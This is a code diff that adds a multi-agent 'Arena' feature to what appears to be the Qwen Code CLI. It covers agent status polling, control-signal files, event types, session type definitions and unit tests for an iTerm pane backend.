+ if (this.sessionStatus === ArenaSessionStatus.IDLE) { + if ( + previousStatus === AgentStatus.IDLE && + newStatus === AgentStatus.RUNNING + ) { + this.emitProgress(`Agent ${label} is working on a follow-up task…`); + } else if ( + previousStatus === AgentStatus.RUNNING && + newStatus === AgentStatus.IDLE + ) { + if (options?.roundCancelledByUser) { + this.emitProgress(`Agent ${label} is cancelled by user.`, 'warning'); + } else { + this.emitProgress( + `Agent ${label} finished follow-up task.`, + 'success', + ); + } + } + } + + // Emit AGENT_COMPLETE when agent reaches a terminal status + if (isTerminalStatus(newStatus)) { + const result = this.buildAgentResult(agent); + + this.eventEmitter.emit(ArenaEventType.AGENT_COMPLETE, { + sessionId: this.requireConfig().sessionId, + agentId, + result, + timestamp: Date.now(), + }); + + // Log arena agent completed telemetry + const agentTelemetryStatus = + newStatus === AgentStatus.COMPLETED + ? ('completed' as const) + : newStatus === AgentStatus.FAILED + ? ('failed' as const) + : ('cancelled' as const); + logArenaAgentCompleted( + this.config, + makeArenaAgentCompletedEvent({ + arena_session_id: this.sessionId ?? 
'', + agent_session_id: agent.agentSessionId, + agent_model_id: agent.model.modelId, + status: agentTelemetryStatus, + duration_ms: agent.stats.durationMs, + rounds: agent.stats.rounds, + total_tokens: agent.stats.totalTokens, + input_tokens: agent.stats.inputTokens, + output_tokens: agent.stats.outputTokens, + tool_calls: agent.stats.toolCalls, + successful_tool_calls: agent.stats.successfulToolCalls, + failed_tool_calls: agent.stats.failedToolCalls, + }), + ); + + this.callbacks.onAgentComplete?.(result); + } + } + + private buildAgentResult(agent: ArenaAgentState): ArenaAgentResult { + return { + agentId: agent.agentId, + model: agent.model, + status: agent.status, + worktree: agent.worktree, + finalText: agent.accumulatedText || undefined, + error: agent.error, + stats: { ...agent.stats }, + startedAt: agent.startedAt, + endedAt: Date.now(), + }; + } + + // ─── Arena Session Directory ────────────────────────────────── + + /** + * Get the arena session directory for the current session. + * All status and control files are stored here. + * + * Returns the absolute path to the session directory, e.g. + * `~/.qwen/worktrees//`. The directory contains: + * - `config.json` — consolidated session config + per-agent status + * - `agents/.json` — individual agent status files + * - `control/` — control signals (shutdown, cancel) + */ + getArenaSessionDir(): string { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + return GitWorktreeService.getSessionDir( + this.worktreeDirName!, + this.arenaBaseDir, + ); + } + + // ─── Private: Polling & Control Signals ────────────────────── + + /** + * Wait for all agents to reach IDLE or TERMINATED state. + * Returns true if all agents settled, false if timeout was reached. 
+ */ + private waitForAllAgentsSettled(timeoutMs?: number): Promise { + return new Promise((resolve) => { + const checkSettled = () => { + for (const agent of this.agents.values()) { + if (!isSettledStatus(agent.status)) { + return false; + } + } + return true; + }; + + if (checkSettled()) { + resolve(true); + return; + } + + let timeoutHandle: ReturnType | undefined; + if (timeoutMs !== undefined) { + timeoutHandle = setTimeout(() => { + clearInterval(pollHandle); + resolve(false); + }, timeoutMs); + } + + // Re-check periodically (piggybacks on the same polling interval) + const pollHandle = setInterval(() => { + if (checkSettled()) { + clearInterval(pollHandle); + if (timeoutHandle) clearTimeout(timeoutHandle); + resolve(true); + } + }, ARENA_POLL_INTERVAL_MS); + }); + } + + /** + * Start polling agent status files at a fixed interval. + */ + private startPolling(): void { + if (this.pollingInterval) { + return; + } + + this.pollingInterval = setInterval(() => { + this.pollAgentStatuses().catch((error) => { + debugLogger.error('Error polling agent statuses:', error); + }); + }, ARENA_POLL_INTERVAL_MS); + } + + /** + * Stop the polling interval. + */ + private stopPolling(): void { + if (this.pollingInterval) { + clearInterval(this.pollingInterval); + this.pollingInterval = null; + } + } + + /** + * Set up event bridges for in-process agents. + * Subscribes to each AgentInteractive's events to update ArenaManager state. + * Listeners are tracked in `eventBridgeCleanups` for teardown. + */ + private setupInProcessEventBridge(backend: InProcessBackend): void { + for (const agent of this.agents.values()) { + const interactive = backend.getAgent(agent.agentId); + if (!interactive) continue; + + const emitter = interactive.getEventEmitter(); + if (!emitter) continue; + + // AgentInteractive emits canonical AgentStatus values — no mapping needed. 
+ + const syncStats = () => { + const { totalToolCalls, totalDurationMs, ...rest } = + interactive.getStats(); + Object.assign(agent.stats, rest, { + toolCalls: totalToolCalls, + durationMs: totalDurationMs, + }); + }; + + agent.syncStats = syncStats; + + const applyStatus = ( + incoming: AgentStatus, + options?: { roundCancelledByUser?: boolean }, + ) => { + const resolved = this.resolveTransition(agent.status, incoming); + if (!resolved) return; + if (resolved === AgentStatus.FAILED) { + agent.error = + interactive.getLastRoundError() || interactive.getError(); + } + if (isSettledStatus(resolved)) { + agent.stats.durationMs = Date.now() - agent.startedAt; + } + this.updateAgentStatus(agent.agentId, resolved, options); + }; + + // Sync stats before mapping so counters are up-to-date even when + // the provider omits usage_metadata events. + const onStatusChange = (event: AgentStatusChangeEvent) => { + syncStats(); + applyStatus(event.newStatus, { + roundCancelledByUser: event.roundCancelledByUser, + }); + // Write status files so external consumers get a consistent + // file-based view regardless of backend mode. + this.flushInProcessStatusFiles().catch((err) => + debugLogger.error('Failed to flush in-process status files:', err), + ); + }; + + const onUsageMetadata = () => { + syncStats(); + this.flushInProcessStatusFiles().catch((err) => + debugLogger.error('Failed to flush in-process status files:', err), + ); + }; + + emitter.on(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.on(AgentEventType.USAGE_METADATA, onUsageMetadata); + + // Store cleanup functions so listeners can be removed during teardown + this.eventBridgeCleanups.push(() => { + emitter.off(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.off(AgentEventType.USAGE_METADATA, onUsageMetadata); + }); + + // Reconcile: if the agent already transitioned before the bridge was + // attached (e.g. 
fast completion or createChat failure during spawn), + // backfill stats and apply its current status now so + // waitForAllAgentsSettled sees it. + syncStats(); + applyStatus(interactive.getStatus()); + } + + // Flush status files once after reconciliation so that agents which + // already settled before the bridge was attached still get written to disk. + this.flushInProcessStatusFiles().catch((err) => + debugLogger.error('Failed to flush in-process status files:', err), + ); + } + + /** + * Remove all event bridge listeners registered by setupInProcessEventBridge. + */ + private teardownEventBridge(): void { + for (const cleanup of this.eventBridgeCleanups) { + cleanup(); + } + this.eventBridgeCleanups.length = 0; + } + + /** + * Read per-agent status files from `/agents/` directory. + * Updates agent stats, emits AGENT_STATS_UPDATE events, and writes a + * consolidated `status.json` at the arena session root. + */ + private async pollAgentStatuses(): Promise { + const sessionDir = this.getArenaSessionDir(); + const agentsDir = path.join(sessionDir, 'agents'); + const consolidatedAgents: Record = {}; + + for (const agent of this.agents.values()) { + // Only poll agents that are actively working + if ( + isSettledStatus(agent.status) || + agent.status === AgentStatus.INITIALIZING + ) { + continue; + } + + try { + const statusPath = path.join( + agentsDir, + `${safeAgentId(agent.agentId)}.json`, + ); + const content = await fs.readFile(statusPath, 'utf-8'); + const statusFile = JSON.parse(content) as ArenaStatusFile; + + // Collect for consolidated file + consolidatedAgents[agent.agentId] = statusFile; + + // Update agent stats from the status file. 
+ agent.stats = { + ...agent.stats, + ...statusFile.stats, + }; + + // Detect state transitions from the sideband status file + const resolved = this.resolveTransition( + agent.status, + statusFile.status, + ); + if (resolved) { + if (resolved === AgentStatus.FAILED && statusFile.error) { + agent.error = statusFile.error; + } + this.updateAgentStatus(agent.agentId, resolved); + } + + this.callbacks.onAgentStatsUpdate?.(agent.agentId, statusFile.stats); + } catch (error: unknown) { + // File may not exist yet (agent hasn't written first status) + if (isNodeError(error) && error.code === 'ENOENT') { + continue; + } + debugLogger.error( + `Error reading status for agent ${agent.agentId}:`, + error, + ); + } + } + + // Write consolidated status.json at the arena session root + if (Object.keys(consolidatedAgents).length > 0) { + await this.writeConsolidatedStatus(consolidatedAgents); + } + } + + /** + * Merge agent status data into the arena session's config.json. + * Reads the existing config, adds/updates `updatedAt` and `agents`, + * then writes back atomically (temp file → rename). 
+ */ + private async writeConsolidatedStatus( + agents: Record, + ): Promise { + const sessionDir = this.getArenaSessionDir(); + const configPath = path.join(sessionDir, 'config.json'); + + try { + // Read existing config.json written by GitWorktreeService + let config: ArenaConfigFile; + try { + const content = await fs.readFile(configPath, 'utf-8'); + config = JSON.parse(content) as ArenaConfigFile; + } catch { + // If config.json doesn't exist yet, create a minimal one + const arenaConfig = this.requireConfig(); + config = { + arenaSessionId: arenaConfig.sessionId, + sourceRepoPath: arenaConfig.sourceRepoPath, + worktreeNames: arenaConfig.models.map( + (m) => m.displayName || m.modelId, + ), + createdAt: this.startedAt!, + }; + } + + // Merge in the agent status data + config.updatedAt = Date.now(); + config.agents = agents; + + await atomicWriteJSON(configPath, config); + } catch (error) { + debugLogger.error( + 'Failed to write consolidated status to config.json:', + error, + ); + } + } + + /** + * Build an ArenaStatusFile snapshot from in-memory agent state. + */ + private buildStatusFile(agent: ArenaAgentState): ArenaStatusFile { + return { + agentId: agent.agentId, + status: agent.status, + updatedAt: Date.now(), + rounds: agent.stats.rounds, + stats: { ...agent.stats }, + finalSummary: null, + error: agent.error ?? null, + }; + } + + /** + * Write status files for all in-process agents and update the + * consolidated config.json. + * + * In PTY mode these files are written by ArenaAgentClient inside each + * child process. In in-process mode there is no child process, so the + * ArenaManager writes them directly so that external consumers + * (e.g. an orchestrating agent) get a consistent file-based view + * regardless of backend. 
+ */ + private async flushInProcessStatusFiles(): Promise { + const sessionDir = this.getArenaSessionDir(); + const agentsDir = path.join(sessionDir, 'agents'); + await fs.mkdir(agentsDir, { recursive: true }); + + const consolidatedAgents: Record = {}; + + for (const agent of this.agents.values()) { + const statusFile = this.buildStatusFile(agent); + const filePath = path.join( + agentsDir, + `${safeAgentId(agent.agentId)}.json`, + ); + await atomicWriteJSON(filePath, statusFile); + consolidatedAgents[agent.agentId] = statusFile; + } + + if (Object.keys(consolidatedAgents).length > 0) { + await this.writeConsolidatedStatus(consolidatedAgents); + } + } + + /** + * Write a control signal to the arena session's control/ directory. + * The child agent consumes (reads + deletes) this file. + */ + async sendControlSignal( + agentId: string, + type: ArenaControlSignal['type'], + reason: string, + ): Promise { + const agent = this.agents.get(agentId); + if (!agent) { + debugLogger.error( + `Cannot send control signal: agent ${agentId} not found`, + ); + return; + } + + const controlSignal: ArenaControlSignal = { + type, + reason, + timestamp: Date.now(), + }; + + const sessionDir = this.getArenaSessionDir(); + const controlDir = path.join(sessionDir, 'control'); + const controlPath = path.join(controlDir, `${safeAgentId(agentId)}.json`); + + try { + await fs.mkdir(controlDir, { recursive: true }); + await fs.writeFile( + controlPath, + JSON.stringify(controlSignal, null, 2), + 'utf-8', + ); + debugLogger.info( + `Sent ${type} control signal to agent ${agentId}: ${reason}`, + ); + } catch (error) { + debugLogger.error( + `Failed to send control signal to agent ${agentId}:`, + error, + ); + } + } + + private async collectResults(): Promise { + if (!this.arenaConfig) { + throw new Error('Arena config not initialized'); + } + + const agents: ArenaAgentResult[] = []; + + for (const agent of this.agents.values()) { + const result = this.buildAgentResult(agent); + + // Get diff 
for agents that finished their task (IDLE or COMPLETED) + if (isSuccessStatus(agent.status)) { + try { + result.diff = await this.worktreeService.getWorktreeDiff( + agent.worktree.path, + ); + } catch (error) { + debugLogger.error( + `Failed to get diff for agent ${agent.agentId}:`, + error, + ); + } + } + + agents.push(result); + } + + const endedAt = Date.now(); + + return { + sessionId: this.arenaConfig.sessionId, + task: this.arenaConfig.task, + status: this.sessionStatus, + agents, + startedAt: this.startedAt!, + endedAt, + totalDurationMs: endedAt - this.startedAt!, + wasRepoInitialized: false, + }; + } +} diff --git a/packages/core/src/agents/arena/arena-events.ts b/packages/core/src/agents/arena/arena-events.ts new file mode 100644 index 000000000..def7c2444 --- /dev/null +++ b/packages/core/src/agents/arena/arena-events.ts @@ -0,0 +1,184 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { EventEmitter } from 'events'; +import type { + ArenaModelConfig, + ArenaAgentResult, + ArenaSessionResult, +} from './types.js'; +import type { AgentStatus } from '../runtime/agent-types.js'; + +/** + * Arena event types. 
+ */ +export enum ArenaEventType { + /** Arena session started */ + SESSION_START = 'session_start', + /** Informational or warning update during session lifecycle */ + SESSION_UPDATE = 'session_update', + /** Arena session completed */ + SESSION_COMPLETE = 'session_complete', + /** Arena session failed */ + SESSION_ERROR = 'session_error', + /** Agent started */ + AGENT_START = 'agent_start', + /** Agent status changed */ + AGENT_STATUS_CHANGE = 'agent_status_change', + /** Agent completed */ + AGENT_COMPLETE = 'agent_complete', + /** Agent error */ + AGENT_ERROR = 'agent_error', +} + +export type ArenaEvent = + | 'session_start' + | 'session_update' + | 'session_complete' + | 'session_error' + | 'agent_start' + | 'agent_status_change' + | 'agent_complete' + | 'agent_error'; + +/** + * Event payload for session start. + */ +export interface ArenaSessionStartEvent { + sessionId: string; + task: string; + models: ArenaModelConfig[]; + timestamp: number; +} + +/** + * Event payload for session complete. + */ +export interface ArenaSessionCompleteEvent { + sessionId: string; + result: ArenaSessionResult; + timestamp: number; +} + +/** + * Event payload for session error. + */ +export interface ArenaSessionErrorEvent { + sessionId: string; + error: string; + timestamp: number; +} + +/** + * Event payload for agent start. + */ +export interface ArenaAgentStartEvent { + sessionId: string; + agentId: string; + model: ArenaModelConfig; + worktreePath: string; + timestamp: number; +} + +/** + * Event payload for agent error. + */ +export interface ArenaAgentErrorEvent { + sessionId: string; + agentId: string; + error: string; + timestamp: number; +} + +/** + * Event payload for agent complete. + */ +export interface ArenaAgentCompleteEvent { + sessionId: string; + agentId: string; + result: ArenaAgentResult; + timestamp: number; +} + +/** + * Event payload for agent status change. 
+ */ +export interface ArenaAgentStatusChangeEvent { + sessionId: string; + agentId: string; + previousStatus: AgentStatus; + newStatus: AgentStatus; + timestamp: number; +} + +/** + * Event payload for session update (informational or warning). + */ +export type ArenaSessionUpdateType = 'info' | 'warning' | 'success'; + +export interface ArenaSessionUpdateEvent { + sessionId: string; + type: ArenaSessionUpdateType; + message: string; + timestamp: number; +} + +/** + * Type map for arena events. + */ +export interface ArenaEventMap { + [ArenaEventType.SESSION_START]: ArenaSessionStartEvent; + [ArenaEventType.SESSION_UPDATE]: ArenaSessionUpdateEvent; + [ArenaEventType.SESSION_COMPLETE]: ArenaSessionCompleteEvent; + [ArenaEventType.SESSION_ERROR]: ArenaSessionErrorEvent; + [ArenaEventType.AGENT_START]: ArenaAgentStartEvent; + [ArenaEventType.AGENT_STATUS_CHANGE]: ArenaAgentStatusChangeEvent; + [ArenaEventType.AGENT_COMPLETE]: ArenaAgentCompleteEvent; + [ArenaEventType.AGENT_ERROR]: ArenaAgentErrorEvent; +} + +/** + * Event emitter for Arena events. 
+ */ +export class ArenaEventEmitter { + private ee = new EventEmitter(); + + on( + event: E, + listener: (payload: ArenaEventMap[E]) => void, + ): void { + this.ee.on(event, listener as (...args: unknown[]) => void); + } + + off( + event: E, + listener: (payload: ArenaEventMap[E]) => void, + ): void { + this.ee.off(event, listener as (...args: unknown[]) => void); + } + + emit( + event: E, + payload: ArenaEventMap[E], + ): void { + this.ee.emit(event, payload); + } + + once( + event: E, + listener: (payload: ArenaEventMap[E]) => void, + ): void { + this.ee.once(event, listener as (...args: unknown[]) => void); + } + + removeAllListeners(event?: ArenaEvent): void { + if (event) { + this.ee.removeAllListeners(event); + } else { + this.ee.removeAllListeners(); + } + } +} diff --git a/packages/core/src/agents/arena/index.ts b/packages/core/src/agents/arena/index.ts new file mode 100644 index 000000000..e744250c7 --- /dev/null +++ b/packages/core/src/agents/arena/index.ts @@ -0,0 +1,14 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +// Arena-specific exports +export * from './types.js'; +export * from './arena-events.js'; +export * from './ArenaManager.js'; +export * from './ArenaAgentClient.js'; + +// Re-export shared agent infrastructure for backwards compatibility +export * from '../backends/index.js'; diff --git a/packages/core/src/agents/arena/types.ts b/packages/core/src/agents/arena/types.ts new file mode 100644 index 000000000..5b9a9ecab --- /dev/null +++ b/packages/core/src/agents/arena/types.ts @@ -0,0 +1,280 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import type { Content } from '@google/genai'; +import type { WorktreeInfo } from '../../services/gitWorktreeService.js'; +import type { DisplayMode } from '../backends/types.js'; +import type { AgentStatus } from '../runtime/agent-types.js'; + +/** + * Maximum number of concurrent agents allowed in an Arena 
session. + */ +export const ARENA_MAX_AGENTS = 5; + +/** + * Represents the status of an Arena session. + */ +export enum ArenaSessionStatus { + /** Session is being set up */ + INITIALIZING = 'initializing', + /** Session is running */ + RUNNING = 'running', + /** All agents finished their current task and are idle (can accept follow-ups) */ + IDLE = 'idle', + /** Session completed for good (winner selected or explicit end) */ + COMPLETED = 'completed', + /** Session was cancelled */ + CANCELLED = 'cancelled', + /** Session failed during initialization */ + FAILED = 'failed', +} + +/** + * Configuration for a model participating in the Arena. + */ +export interface ArenaModelConfig { + /** Model identifier (e.g., 'qwen-coder-plus', 'gpt-4') */ + modelId: string; + /** Authentication type for this model */ + authType: string; + /** Display name for UI */ + displayName?: string; + /** Optional API key override */ + apiKey?: string; + /** Optional base URL override */ + baseUrl?: string; +} + +/** + * Configuration for an Arena session. + */ +export interface ArenaConfig { + /** Unique identifier for this Arena session */ + sessionId: string; + /** The task/prompt to be executed by all agents */ + task: string; + /** Models participating in the Arena */ + models: ArenaModelConfig[]; + /** Maximum number of rounds per agent (default: 50) */ + maxRoundsPerAgent?: number; + /** Total timeout in seconds for the entire Arena session (default: 600) */ + timeoutSeconds?: number; + /** Approval mode inherited from the main process (e.g., 'auto', 'suggest', etc.) */ + approvalMode?: string; + /** Source repository path */ + sourceRepoPath: string; + /** Chat history from the parent session for agent context seeding. */ + chatHistory?: Content[]; +} + +/** + * Statistics for an individual Arena agent. 
+ */ +export interface ArenaAgentStats { + /** Number of completed rounds */ + rounds: number; + /** Total tokens used */ + totalTokens: number; + /** Input tokens used */ + inputTokens: number; + /** Output tokens used */ + outputTokens: number; + /** Total execution time in milliseconds */ + durationMs: number; + /** Number of tool calls made */ + toolCalls: number; + /** Number of successful tool calls */ + successfulToolCalls: number; + /** Number of failed tool calls */ + failedToolCalls: number; +} + +/** + * Result from a single Arena agent. + */ +export interface ArenaAgentResult { + /** Agent identifier */ + agentId: string; + /** Model configuration used */ + model: ArenaModelConfig; + /** Final status */ + status: AgentStatus; + /** Worktree information */ + worktree: WorktreeInfo; + /** Final text output from the agent */ + finalText?: string; + /** Error message if failed */ + error?: string; + /** Execution statistics */ + stats: ArenaAgentStats; + /** Git diff of changes made */ + diff?: string; + /** Files modified by this agent */ + modifiedFiles?: string[]; + /** Start timestamp */ + startedAt: number; + /** End timestamp */ + endedAt?: number; +} + +/** + * Result from an Arena session. + */ +export interface ArenaSessionResult { + /** Session identifier */ + sessionId: string; + /** Original task */ + task: string; + /** Session status */ + status: ArenaSessionStatus; + /** Results from all agents */ + agents: ArenaAgentResult[]; + /** Start timestamp */ + startedAt: number; + /** End timestamp */ + endedAt?: number; + /** Total duration in milliseconds */ + totalDurationMs?: number; + /** Whether the repository was auto-initialized */ + wasRepoInitialized: boolean; + /** Selected winner (agent ID) if user has chosen */ + selectedWinner?: string; +} + +/** + * Options for starting an Arena session. 
+ */ +export interface ArenaStartOptions { + /** Models to participate (at least 2, max ARENA_MAX_AGENTS) */ + models: ArenaModelConfig[]; + /** The task/prompt for all agents */ + task: string; + /** Maximum rounds per agent */ + maxRoundsPerAgent?: number; + /** Timeout in seconds */ + timeoutSeconds?: number; + /** Approval mode to use for agents (inherited from main process) */ + approvalMode?: string; + /** Initial terminal columns for agent PTYs (default: process.stdout.columns or 120) */ + cols?: number; + /** Initial terminal rows for agent PTYs (default: process.stdout.rows or 40) */ + rows?: number; + /** Display mode preference */ + displayMode?: DisplayMode; + /** + * Optional chat history from the main session to seed each arena agent + * with conversational context. When provided, this history is prepended + * to each agent's chat so they understand the prior conversation. + */ + chatHistory?: Content[]; +} + +/** + * Callback functions for Arena events. + */ +export interface ArenaCallbacks { + /** Called when an agent starts */ + onAgentStart?: (agentId: string, model: ArenaModelConfig) => void; + /** Called when an agent completes */ + onAgentComplete?: (result: ArenaAgentResult) => void; + /** Called when agent stats are updated */ + onAgentStatsUpdate?: ( + agentId: string, + stats: Partial, + ) => void; + /** Called when the arena session completes */ + onArenaComplete?: (result: ArenaSessionResult) => void; + /** Called on arena error */ + onArenaError?: (error: Error) => void; +} + +/** + * File format for per-agent status (child → main process). + * Written atomically by ArenaAgentClient to + * `/agents/.json`. + */ +export interface ArenaStatusFile { + agentId: string; + status: AgentStatus; + updatedAt: number; + rounds: number; + currentActivity?: string; + stats: ArenaAgentStats; + finalSummary: string | null; + error: string | null; +} + +/** + * File format for the arena session config file (`config.json`). 
+ * + * Initially written by GitWorktreeService with static config fields + * (arenaSessionId, sourceRepoPath, worktreeNames, baseBranch, createdAt). + * Dynamically updated by ArenaManager with agent status data during polling. + */ +export interface ArenaConfigFile { + /** Arena session identifier */ + arenaSessionId: string; + /** Source repository path */ + sourceRepoPath: string; + /** Names of worktrees created */ + worktreeNames: string[]; + /** Base branch used for worktrees */ + baseBranch?: string; + /** Timestamp when the session was created */ + createdAt: number; + /** Timestamp of the last status update (set by ArenaManager polling) */ + updatedAt?: number; + /** Per-agent status data, keyed by agentId (set by ArenaManager polling) */ + agents?: Record; +} + +/** + * Control signal format for control.json (main → child process). + * Written by ArenaManager, consumed (read + deleted) by ArenaAgentClient. + */ +export interface ArenaControlSignal { + type: 'shutdown' | 'cancel'; + reason: string; + timestamp: number; +} + +/** + * Convert an agentId (e.g. "arena-xxx/qwen-coder-plus") to a filename-safe + * string by replacing path-unsafe characters with "--". + */ +export function safeAgentId(agentId: string): string { + return agentId.replace(/[/\\:*?"<>|]/g, '--'); +} + +/** + * Internal state for tracking an Arena agent during execution. 
+ */ +export interface ArenaAgentState { + /** Agent identifier */ + agentId: string; + /** Model configuration */ + model: ArenaModelConfig; + /** Current status */ + status: AgentStatus; + /** Worktree information */ + worktree: WorktreeInfo; + /** Abort controller for cancellation */ + abortController: AbortController; + /** Current statistics */ + stats: ArenaAgentStats; + /** Start timestamp */ + startedAt: number; + /** Accumulated text output */ + accumulatedText: string; + /** Promise for the agent execution */ + executionPromise?: Promise; + /** Error if failed */ + error?: string; + /** Unique session ID for this agent (for telemetry correlation) */ + agentSessionId: string; + /** Flush latest counters into `stats` (set by in-process event bridge) */ + syncStats?: () => void; +} diff --git a/packages/core/src/agents/backends/ITermBackend.test.ts b/packages/core/src/agents/backends/ITermBackend.test.ts new file mode 100644 index 000000000..124df85ee --- /dev/null +++ b/packages/core/src/agents/backends/ITermBackend.test.ts @@ -0,0 +1,569 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import type { AgentSpawnConfig } from './types.js'; + +// ─── Hoisted mocks for iterm-it2 ──────────────────────────────── +const hoistedVerifyITerm = vi.hoisted(() => vi.fn()); +const hoistedItermSplitPane = vi.hoisted(() => vi.fn()); +const hoistedItermRunCommand = vi.hoisted(() => vi.fn()); +const hoistedItermSendText = vi.hoisted(() => vi.fn()); +const hoistedItermFocusSession = vi.hoisted(() => vi.fn()); +const hoistedItermCloseSession = vi.hoisted(() => vi.fn()); + +vi.mock('./iterm-it2.js', () => ({ + verifyITerm: hoistedVerifyITerm, + itermSplitPane: hoistedItermSplitPane, + itermRunCommand: hoistedItermRunCommand, + itermSendText: hoistedItermSendText, + itermFocusSession: hoistedItermFocusSession, + itermCloseSession: hoistedItermCloseSession, 
+})); + +// ─── Hoisted mocks for node:fs/promises ───────────────────────── +const hoistedFsMkdir = vi.hoisted(() => vi.fn()); +const hoistedFsReadFile = vi.hoisted(() => vi.fn()); +const hoistedFsRm = vi.hoisted(() => vi.fn()); + +vi.mock('node:fs/promises', () => ({ + mkdir: hoistedFsMkdir, + readFile: hoistedFsReadFile, + rm: hoistedFsRm, +})); + +// Mock debug logger +vi.mock('../../utils/debugLogger.js', () => ({ + createDebugLogger: () => ({ + info: vi.fn(), + error: vi.fn(), + warn: vi.fn(), + }), +})); + +import { ITermBackend } from './ITermBackend.js'; + +function makeConfig( + agentId: string, + overrides?: Partial, +): AgentSpawnConfig { + return { + agentId, + command: '/usr/bin/node', + args: ['agent.js'], + cwd: '/tmp/test', + ...overrides, + }; +} + +function setupDefaultMocks(): void { + hoistedVerifyITerm.mockResolvedValue(undefined); + hoistedItermSplitPane.mockResolvedValue('sess-new-1'); + hoistedItermRunCommand.mockResolvedValue(undefined); + hoistedItermSendText.mockResolvedValue(undefined); + hoistedItermFocusSession.mockResolvedValue(undefined); + hoistedItermCloseSession.mockResolvedValue(undefined); + hoistedFsMkdir.mockResolvedValue(undefined); + // Default: marker file doesn't exist yet (agent still running) + hoistedFsReadFile.mockRejectedValue(new Error('ENOENT')); + hoistedFsRm.mockResolvedValue(undefined); +} + +describe('ITermBackend', () => { + let backend: ITermBackend; + let savedItermSessionId: string | undefined; + + beforeEach(() => { + vi.useFakeTimers(); + savedItermSessionId = process.env['ITERM_SESSION_ID']; + delete process.env['ITERM_SESSION_ID']; + setupDefaultMocks(); + backend = new ITermBackend(); + }); + + afterEach(async () => { + await backend.cleanup(); + vi.restoreAllMocks(); + vi.useRealTimers(); + if (savedItermSessionId !== undefined) { + process.env['ITERM_SESSION_ID'] = savedItermSessionId; + } else { + delete process.env['ITERM_SESSION_ID']; + } + }); + + // ─── Initialization 
───────────────────────────────────────── + + it('throws if spawnAgent is called before init', async () => { + await expect(backend.spawnAgent(makeConfig('a1'))).rejects.toThrow( + 'not initialized', + ); + }); + + it('init verifies iTerm availability', async () => { + await backend.init(); + expect(hoistedVerifyITerm).toHaveBeenCalled(); + }); + + it('init creates exit marker directory', async () => { + await backend.init(); + expect(hoistedFsMkdir).toHaveBeenCalledWith( + expect.stringContaining('agent-iterm-exit-'), + { recursive: true }, + ); + }); + + it('init is idempotent', async () => { + await backend.init(); + await backend.init(); + expect(hoistedVerifyITerm).toHaveBeenCalledTimes(1); + }); + + // ─── Spawning ───────────────────────────────────────────── + + it('spawns first agent using ITERM_SESSION_ID when set', async () => { + process.env['ITERM_SESSION_ID'] = 'leader-sess'; + backend = new ITermBackend(); + await backend.init(); + + await backend.spawnAgent(makeConfig('agent-1')); + + expect(hoistedItermSplitPane).toHaveBeenCalledWith('leader-sess'); + expect(hoistedItermRunCommand).toHaveBeenCalledWith( + 'sess-new-1', + expect.any(String), + ); + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('spawns first agent without ITERM_SESSION_ID', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('agent-1')); + + expect(hoistedItermSplitPane).toHaveBeenCalledWith(undefined); + expect(backend.getActiveAgentId()).toBe('agent-1'); + }); + + it('spawns subsequent agent from last session', async () => { + await backend.init(); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('agent-1')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('agent-2')); + + // Second split should use the first agent's session as source + expect(hoistedItermSplitPane).toHaveBeenLastCalledWith('sess-1'); + }); + + it('rejects duplicate agent IDs', 
async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('dup')); + + await expect(backend.spawnAgent(makeConfig('dup'))).rejects.toThrow( + 'already exists', + ); + }); + + it('registers failed agent and fires exit callback on spawn error', async () => { + await backend.init(); + hoistedItermSplitPane.mockRejectedValueOnce(new Error('split failed')); + + const exitCallback = vi.fn(); + backend.setOnAgentExit(exitCallback); + + await backend.spawnAgent(makeConfig('fail')); + + expect(exitCallback).toHaveBeenCalledWith('fail', 1, null); + }); + + // ─── buildShellCommand (env key validation) ──────────────── + + it('rejects invalid environment variable names', async () => { + await backend.init(); + + await expect( + backend.spawnAgent(makeConfig('bad-env', { env: { 'FOO BAR': 'baz' } })), + ).rejects.toThrow('Invalid environment variable name'); + }); + + it('rejects env key starting with a digit', async () => { + await backend.init(); + + await expect( + backend.spawnAgent(makeConfig('bad-env', { env: { '1VAR': 'baz' } })), + ).rejects.toThrow('Invalid environment variable name'); + }); + + it('accepts valid environment variable names', async () => { + await backend.init(); + + await expect( + backend.spawnAgent( + makeConfig('good-env', { + env: { MY_VAR_123: 'hello', _PRIVATE: 'world' }, + }), + ), + ).resolves.toBeUndefined(); + }); + + // ─── buildShellCommand (atomic marker write) ────────────── + + it('builds command with atomic exit marker write', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const cmdArg = hoistedItermRunCommand.mock.calls[0]![1] as string; + // Should contain write-then-rename pattern + expect(cmdArg).toMatch(/echo \$\? 
> .+\.tmp.+ && mv .+\.tmp/); + }); + + it('builds command with cd and quoted args', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a')); + + const cmdArg = hoistedItermRunCommand.mock.calls[0]![1] as string; + expect(cmdArg).toContain("cd '/tmp/test'"); + expect(cmdArg).toContain("'/usr/bin/node'"); + expect(cmdArg).toContain("'agent.js'"); + }); + + it('includes env vars in command when provided', async () => { + await backend.init(); + await backend.spawnAgent(makeConfig('a', { env: { NODE_ENV: 'test' } })); + + const cmdArg = hoistedItermRunCommand.mock.calls[0]![1] as string; + expect(cmdArg).toContain("NODE_ENV='test'"); + expect(cmdArg).toContain('env '); + }); + + // ─── Navigation ─────────────────────────────────────────── + + it('switchTo changes active agent and focuses session', async () => { + await backend.init(); + hoistedItermSplitPane.mockResolvedValueOnce('sess-1'); + await backend.spawnAgent(makeConfig('a')); + + hoistedItermSplitPane.mockResolvedValueOnce('sess-2'); + await backend.spawnAgent(makeConfig('b')); + + backend.switchTo('b'); + expect(backend.getActiveAgentId()).toBe('b'); + 